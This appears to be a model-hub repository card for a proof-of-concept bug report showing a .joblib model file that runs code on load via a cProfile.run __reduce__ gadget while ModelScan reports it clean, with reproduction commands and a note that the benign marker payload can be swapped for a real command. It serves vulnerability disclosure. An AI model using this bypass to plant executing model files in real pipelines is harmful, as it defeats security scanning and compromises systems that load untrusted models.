YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

ModelScan Bypass β€” Arbitrary Code Execution in .joblib via cProfile.run gadget

Proof-of-concept for a Huntr Model File Format report.

model.joblib runs code on joblib.load() while ModelScan reports it clean. The malicious __reduce__ uses cProfile.run β€” a code-executing stdlib callable that is not on ModelScan's PickleUnsafeOpScan denylist β€” and hides the command in a string argument the scanner never inspects.

Files

  • model.joblib β€” the PoC model file (benign payload: writes modelscan_poc_executed.txt)
  • exploit.py β€” builds the model, scans it with ModelScan, loads it, prints the result

Reproduce

pip install joblib modelscan
# 1) scanner says it is safe:
modelscan -p model.joblib          # ->  No issues found! πŸŽ‰
# 2) loading it executes code:
python -c "import joblib; joblib.load('model.joblib')"
ls modelscan_poc_executed.txt      # marker proves code ran on load
# or run everything at once:
python exploit.py                  # -> No issues found (BYPASS) + CODE EXECUTED

Impact

ModelScan is used to gate untrusted models in MLOps pipelines / model hubs. This file passes the scan as clean yet achieves arbitrary code execution on load β€” defeating the control. Verified on modelscan 0.8.6 / joblib 1.5.3.

The payload here is benign (writes a marker file). Swap the command in exploit.py to confirm real command execution.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support